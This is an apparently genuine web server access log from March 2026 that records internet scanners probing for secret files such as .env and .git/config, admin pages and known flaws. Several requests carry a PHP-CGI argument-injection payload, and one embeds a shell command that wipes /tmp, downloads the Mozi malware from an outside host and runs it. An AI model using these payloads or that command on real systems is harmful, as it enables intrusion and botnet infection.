165.154.104.235 - - [26/Mar/2026:07:48:16 +0200] "GET /config.json HTTP/1.1" 404 9 "{}"
82.165.66.87 - - [26/Mar/2026:07:53:41 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
82.165.66.87 - - [26/Mar/2026:07:53:41 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
82.165.66.87 - - [26/Mar/2026:07:53:44 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:07:55:08 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
194.50.16.253 - - [26/Mar/2026:08:04:28 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:08:13:58 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
15.204.34.10 - - [26/Mar/2026:08:28:45 +0200] "GET /wp-json/bm/v1/ HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:08:53:52 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:08:57:53 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:09:54:25 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
87.121.84.56 - - [26/Mar/2026:09:58:04 +0200] "GET /dispatch.asp HTTP/1.1" 404 9 "{}"
78.96.80.186 - - [26/Mar/2026:10:00:13 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 16 "{}"
185.156.73.73 - - [26/Mar/2026:10:37:20 +0200] "GET /sslvpn_logon.shtml HTTP/1.0" 404 9 "{}"
178.62.110.143 - - [26/Mar/2026:10:49:25 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:10:56:00 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:11:00:40 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:11:06:11 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
103.72.9.83 - - [26/Mar/2026:11:11:36 +0200] "POST /HNAP1/ HTTP/1.0" 404 9 "{}"
185.242.3.66 - - [26/Mar/2026:11:21:48 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:11:40:42 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
64.62.156.67 - - [26/Mar/2026:11:51:14 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.62.156.66 - - [26/Mar/2026:12:03:47 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
118.193.38.178 - - [26/Mar/2026:13:00:40 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
118.193.38.178 - - [26/Mar/2026:13:00:41 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
23.144.4.114 - - [26/Mar/2026:13:09:13 +0200] "POST / HTTP/1.1" 400 11 "{}"
172.203.224.88 - - [26/Mar/2026:13:10:10 +0200] "GET /actuator/health HTTP/1.1" 404 9 "{}"
207.154.235.140 - - [26/Mar/2026:14:46:51 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
152.32.204.21 - - [26/Mar/2026:14:53:29 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
152.32.204.21 - - [26/Mar/2026:14:53:31 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
152.32.204.21 - - [26/Mar/2026:14:53:38 +0200] "GET /config.json HTTP/1.1" 404 9 "{}"
23.144.4.114 - - [26/Mar/2026:15:07:32 +0200] "POST / HTTP/1.1" 400 11 "{}"
135.237.125.174 - - [26/Mar/2026:15:38:53 +0200] "GET /druid/index.html HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:15:46:03 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
118.145.100.92 - - [26/Mar/2026:15:47:05 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
118.145.100.92 - - [26/Mar/2026:15:47:05 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
118.145.100.92 - - [26/Mar/2026:15:47:37 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
20.163.2.150 - - [26/Mar/2026:15:53:24 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [26/Mar/2026:15:59:19 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
213.209.159.175 - - [26/Mar/2026:16:23:38 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
213.209.159.175 - - [26/Mar/2026:16:23:38 +0200] "GET /admin/.env HTTP/1.1" 404 9 "{}"
213.209.159.175 - - [26/Mar/2026:16:23:39 +0200] "GET /api/.env HTTP/1.1" 404 9 "{}"
213.209.159.175 - - [26/Mar/2026:16:23:39 +0200] "GET /app/.env HTTP/1.1" 404 9 "{}"
213.209.159.175 - - [26/Mar/2026:16:23:39 +0200] "GET /backend/.env HTTP/1.1" 404 9 "{}"
159.223.189.76 - - [26/Mar/2026:16:29:33 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:18:31:23 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:18:31:23 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:41:06 +0200] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:41:07 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:41:07 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:41:08 +0200] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:18:42:06 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:18:42:06 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:45:10 +0200] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:45:10 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:45:10 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:45:11 +0200] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [26/Mar/2026:18:45:11 +0200] "POST / HTTP/1.1" 400 11 "{}"
35.246.182.245 - - [26/Mar/2026:18:46:09 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:18:46:10 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:19:17:20 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [26/Mar/2026:19:17:20 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
32.192.75.154 - - [26/Mar/2026:19:53:22 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
85.217.140.44 - - [26/Mar/2026:20:05:15 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
85.217.140.44 - - [26/Mar/2026:20:05:15 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
85.217.140.44 - - [26/Mar/2026:20:05:15 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.207 - - [26/Mar/2026:20:13:26 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.207 - - [26/Mar/2026:20:13:28 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.207 - - [26/Mar/2026:20:14:06 +0200] "GET /security.txt HTTP/1.1" 404 9 "{}"
20.169.85.114 - - [26/Mar/2026:20:43:26 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 9 "{}"
135.119.16.170 - - [26/Mar/2026:21:15:54 +0200] "GET /portal/redlion HTTP/1.1" 404 9 "{}"
20.64.105.235 - - [26/Mar/2026:21:22:47 +0200] "GET /actuator/health HTTP/1.1" 404 9 "{}"
91.230.168.68 - - [26/Mar/2026:21:47:18 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
87.236.176.16 - - [26/Mar/2026:22:19:18 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
159.65.219.252 - - [26/Mar/2026:22:19:19 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:22:20:29 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
64.89.163.241 - - [26/Mar/2026:22:55:45 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [26/Mar/2026:22:58:44 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
199.45.155.99 - - [26/Mar/2026:23:04:17 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
199.45.155.99 - - [26/Mar/2026:23:04:17 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
199.45.155.99 - - [26/Mar/2026:23:04:29 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
194.50.16.253 - - [26/Mar/2026:23:56:02 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [27/Mar/2026:00:20:58 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:00:48:24 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
118.193.45.103 - - [27/Mar/2026:00:52:44 +0200] "GET /version HTTP/1.1" 404 9 "{}"
118.193.45.103 - - [27/Mar/2026:00:52:47 +0200] "GET /v1 HTTP/1.1" 404 9 "{}"
118.193.45.103 - - [27/Mar/2026:00:52:51 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
118.193.45.103 - - [27/Mar/2026:00:52:51 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
84.247.190.4 - - [27/Mar/2026:01:04:51 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
84.247.190.4 - - [27/Mar/2026:01:04:51 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
84.247.190.4 - - [27/Mar/2026:01:04:52 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
202.141.34.213 - - [27/Mar/2026:01:13:47 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://202.141.34.213:35881/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 9 "{}"
43.228.104.170 - - [27/Mar/2026:01:18:46 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
43.228.104.170 - - [27/Mar/2026:01:18:47 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
20.169.105.13 - - [27/Mar/2026:01:18:57 +0200] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 9 "{}"
43.228.104.170 - - [27/Mar/2026:01:19:09 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:01:21:37 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.242.3.64 - - [27/Mar/2026:01:48:47 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 9 "{}"
65.49.20.69 - - [27/Mar/2026:02:19:59 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
20.169.105.44 - - [27/Mar/2026:02:25:05 +0200] "GET /version HTTP/1.1" 404 9 "{}"
65.49.20.69 - - [27/Mar/2026:02:35:46 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [27/Mar/2026:02:56:20 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [27/Mar/2026:02:56:21 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [27/Mar/2026:02:56:22 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [27/Mar/2026:02:56:22 +0200] "GET /security.txt HTTP/1.1" 404 9 "{}"
81.29.142.100 - - [27/Mar/2026:02:56:23 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
77.221.154.34 - - [27/Mar/2026:04:44:11 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
77.221.154.34 - - [27/Mar/2026:04:44:11 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
77.221.154.34 - - [27/Mar/2026:04:44:13 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
81.29.142.6 - - [27/Mar/2026:04:45:04 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
135.237.126.225 - - [27/Mar/2026:04:59:51 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
160.179.32.160 - - [27/Mar/2026:06:13:02 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
160.179.32.160 - - [27/Mar/2026:06:13:02 +0200] "POST / HTTP/1.1" 400 11 "{}"
160.179.32.160 - - [27/Mar/2026:06:13:03 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
160.179.32.160 - - [27/Mar/2026:06:13:03 +0200] "POST / HTTP/1.1" 400 11 "{}"
91.224.92.125 - - [27/Mar/2026:08:10:58 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.38.148.2 - - [27/Mar/2026:08:17:12 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
185.38.148.2 - - [27/Mar/2026:08:17:12 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
185.38.148.2 - - [27/Mar/2026:08:17:14 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
65.49.1.158 - - [27/Mar/2026:09:17:58 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
65.49.1.152 - - [27/Mar/2026:09:19:21 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [27/Mar/2026:09:50:36 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.53.99 - - [27/Mar/2026:09:51:39 +0200] "GET /currentsetting.htm HTTP/1.1" 404 9 "{}"
77.83.39.156 - - [27/Mar/2026:10:27:06 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
77.83.39.156 - - [27/Mar/2026:10:27:06 +0200] "POST / HTTP/1.1" 400 11 "{}"
77.83.39.156 - - [27/Mar/2026:10:27:07 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
77.83.39.156 - - [27/Mar/2026:10:27:19 +0200] "POST / HTTP/1.1" 400 11 "{}"
128.203.200.216 - - [27/Mar/2026:11:08:31 +0200] "GET /hudson HTTP/1.1" 404 9 "{}"
109.248.170.188 - - [27/Mar/2026:11:41:26 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
109.248.170.188 - - [27/Mar/2026:11:41:26 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
109.248.170.188 - - [27/Mar/2026:11:41:39 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
144.31.62.92 - - [27/Mar/2026:11:45:50 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
144.31.62.92 - - [27/Mar/2026:11:45:50 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
144.31.62.92 - - [27/Mar/2026:11:45:51 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
80.82.77.139 - - [27/Mar/2026:11:46:24 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
80.82.77.139 - - [27/Mar/2026:11:46:25 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
80.82.77.139 - - [27/Mar/2026:11:46:25 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:12:09:34 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:12:47:42 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
185.12.59.118 - - [27/Mar/2026:13:23:41 +0200] "GET /Dr0v HTTP/1.1" 404 9 "{}"
77.83.39.82 - - [27/Mar/2026:13:50:11 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
216.24.210.192 - - [27/Mar/2026:15:16:20 +0200] "GET /wp-includes/css/buttons.css HTTP/1.1" 404 9 "{}"
20.65.194.132 - - [27/Mar/2026:15:32:29 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
95.214.53.99 - - [27/Mar/2026:15:50:50 +0200] "GET /currentsetting.htm HTTP/1.1" 404 9 "{}"
194.50.16.253 - - [27/Mar/2026:15:52:14 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"
172.94.9.253 - - [27/Mar/2026:15:53:29 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [27/Mar/2026:17:24:04 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [27/Mar/2026:17:24:04 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [27/Mar/2026:17:24:04 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
20.169.85.114 - - [27/Mar/2026:18:00:36 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [27/Mar/2026:18:31:27 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [27/Mar/2026:18:31:27 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
45.91.64.8 - - [27/Mar/2026:18:32:20 +0200] "GET /aaa9 HTTP/1.1" 404 9 "{}"
45.91.64.8 - - [27/Mar/2026:18:32:20 +0200] "GET /aab9 HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [27/Mar/2026:18:39:12 +0200] "POST /_next HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [27/Mar/2026:18:39:16 +0200] "POST /api HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [27/Mar/2026:18:39:20 +0200] "POST /_next/server HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [27/Mar/2026:18:39:23 +0200] "POST /app HTTP/1.1" 404 9 "{}"
45.205.1.20 - - [27/Mar/2026:18:39:27 +0200] "POST /api/route HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [27/Mar/2026:18:41:16 +0200] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [27/Mar/2026:18:41:17 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [27/Mar/2026:18:41:17 +0200] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [27/Mar/2026:18:41:18 +0200] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [27/Mar/2026:18:42:15 +0200] "GET /webpages/welcome.html HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [27/Mar/2026:18:42:15 +0200] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
34.224.57.237 - - [27/Mar/2026:19:58:19 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:20:15:02 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
79.119.240.238 - - [27/Mar/2026:20:44:04 +0200] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 16 "{}"
79.119.240.238 - - [27/Mar/2026:20:44:04 +0200] "GET /apple-touch-icon.png HTTP/1.1" 404 16 "{}"
79.119.240.238 - - [27/Mar/2026:20:44:04 +0200] "GET /favicon.ico HTTP/1.1" 404 16 "{}"
66.132.172.203 - - [27/Mar/2026:21:06:23 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.203 - - [27/Mar/2026:21:06:27 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
40.77.167.13 - - [27/Mar/2026:21:17:27 +0200] "GET /sitemaps.xml HTTP/1.1" 404 9 "{}"
95.215.0.144 - - [27/Mar/2026:21:36:14 +0200] "GET /aaa9 HTTP/1.1" 404 9 "{}"
95.215.0.144 - - [27/Mar/2026:21:36:14 +0200] "GET /aab9 HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [27/Mar/2026:22:16:26 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
40.77.167.27 - - [27/Mar/2026:22:26:07 +0200] "GET /sitemaps.xml HTTP/1.1" 404 9 "{}"
77.83.39.82 - - [27/Mar/2026:22:46:01 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
91.224.92.125 - - [27/Mar/2026:23:05:15 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
118.145.114.107 - - [27/Mar/2026:23:42:38 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
118.145.114.107 - - [27/Mar/2026:23:42:40 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
20.163.16.165 - - [27/Mar/2026:23:44:57 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
66.132.224.84 - - [27/Mar/2026:23:49:12 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.224.84 - - [27/Mar/2026:23:49:16 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.224.84 - - [27/Mar/2026:23:49:44 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
81.70.79.147 - - [28/Mar/2026:00:37:08 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
81.70.79.147 - - [28/Mar/2026:00:37:09 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
81.70.79.147 - - [28/Mar/2026:00:38:01 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
199.45.154.128 - - [28/Mar/2026:01:13:25 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
199.45.154.128 - - [28/Mar/2026:01:13:25 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
199.45.154.128 - - [28/Mar/2026:01:13:37 +0200] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
64.62.197.154 - - [28/Mar/2026:02:16:03 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.62.197.152 - - [28/Mar/2026:02:30:19 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
94.231.206.134 - - [28/Mar/2026:03:16:17 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
44.220.185.73 - - [28/Mar/2026:03:22:38 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
198.23.187.223 - - [28/Mar/2026:04:04:47 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
198.23.187.223 - - [28/Mar/2026:04:04:48 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 400 11 "{}"
198.23.187.223 - - [28/Mar/2026:04:05:28 +0200] "GET /containers/json HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:06:15 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:06:16 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:06:16 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
160.187.141.195 - - [28/Mar/2026:04:09:26 +0200] "GET /.env HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:15:52 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:15:52 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
160.119.76.55 - - [28/Mar/2026:04:15:52 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:06 +0200] "GET /manage/account/login HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:07 +0200] "GET /admin/index.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:08 +0200] "GET /index.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:09 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:10 +0200] "GET /login.htm HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:10 +0200] "GET /login.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:10 +0200] "GET /login.jsp HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:10 +0200] "GET /login HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:11 +0200] "GET /doc/index.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:11 +0200] "GET /remote/login HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:11 +0200] "GET /admin/login.asp HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:12 +0200] "GET /web/ HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:12 +0200] "GET /webpages/login.html HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:10:14 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:14:43 +0200] "GET /manage/account/login HTTP/1.1" 404 9 "{}"
216.180.246.111 - - [28/Mar/2026:05:14:46 +0200] "GET /admin/index.html HTTP/1.1" 404 9 "{}"
66.132.172.100 - - [28/Mar/2026:05:21:47 +0200] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
66.132.172.100 - - [28/Mar/2026:05:21:47 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
66.132.172.100 - - [28/Mar/2026:05:21:57 +0200] "GET /login HTTP/1.1" 404 9 "{}"
135.237.127.54 - - [28/Mar/2026:05:36:58 +0200] "GET /owa/auth/x.js HTTP/1.1" 404 9 "{}"
59.182.66.214 - - [28/Mar/2026:06:39:20 +0200] "POST /HNAP1/ HTTP/1.0" 404 9 "{}"
64.227.10.52 - - [28/Mar/2026:07:18:25 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.227.10.52 - - [28/Mar/2026:07:18:25 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
172.94.9.253 - - [28/Mar/2026:07:42:04 +0200] "GET /.git/config HTTP/1.1" 404 9 "{}"
194.50.16.253 - - [28/Mar/2026:08:09:30 +0200] "GET /Export_Log?/data/zcfg_config.json HTTP/1.1" 404 9 "{}"
15.204.34.10 - - [28/Mar/2026:08:19:38 +0200] "GET /wp-content/plugins/definite-unique/license.txt HTTP/1.1" 404 9 "{}"
15.204.34.10 - - [28/Mar/2026:08:19:46 +0200] "GET /blog-verify HTTP/1.1" 404 9 "{}"
5.61.209.107 - - [28/Mar/2026:08:20:09 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 9 "{}"
64.89.163.241 - - [28/Mar/2026:08:52:22 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 9 "{}"
216.218.206.69 - - [28/Mar/2026:09:10:11 +0200] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
216.218.206.69 - - [28/Mar/2026:09:11:51 +0200] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
20.118.209.32 - - [28/Mar/2026:09:12:53 +0200] "GET /ReportServer HTTP/1.1" 404 9 "{}"
